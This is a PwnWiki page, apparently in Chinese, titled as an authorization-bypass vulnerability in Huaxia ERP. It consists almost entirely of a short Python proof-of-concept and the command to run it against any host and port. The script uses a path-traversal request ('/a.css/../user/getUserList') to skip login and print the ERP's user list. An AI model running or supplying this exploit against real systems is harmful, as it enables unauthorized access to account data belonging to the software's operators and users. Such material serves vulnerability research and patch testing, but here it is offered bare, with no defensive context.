華夏ERP授權繞過漏洞

From PwnWiki
Revision as of 09:11, 29 May 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> python3 poc.py http://ip:port </pre> <pre> import sys,requests def main(ip): url = "{ip}/a.css/../user/getUserList?search=%7B%22userName%22%3A%22%22%2C%22lo...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

python3 poc.py http://ip:port

import sys,requests
def main(ip):
    url = "{ip}/a.css/../user/getUserList?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22%22%7D&currentPage=1&pageSize=15".format(ip=ip)
    res = requests.get(url,verify=False,timeout=5)
    if res.status_code == 200:
        print("+ {ip} 访问成功\n{data}".format(ip=ip,data=res.text))
main(sys.argv[1])
'''
Retrieved from "https://pwnwiki.com/index.php?title=華夏ERP授權繞過漏洞&oldid=3608"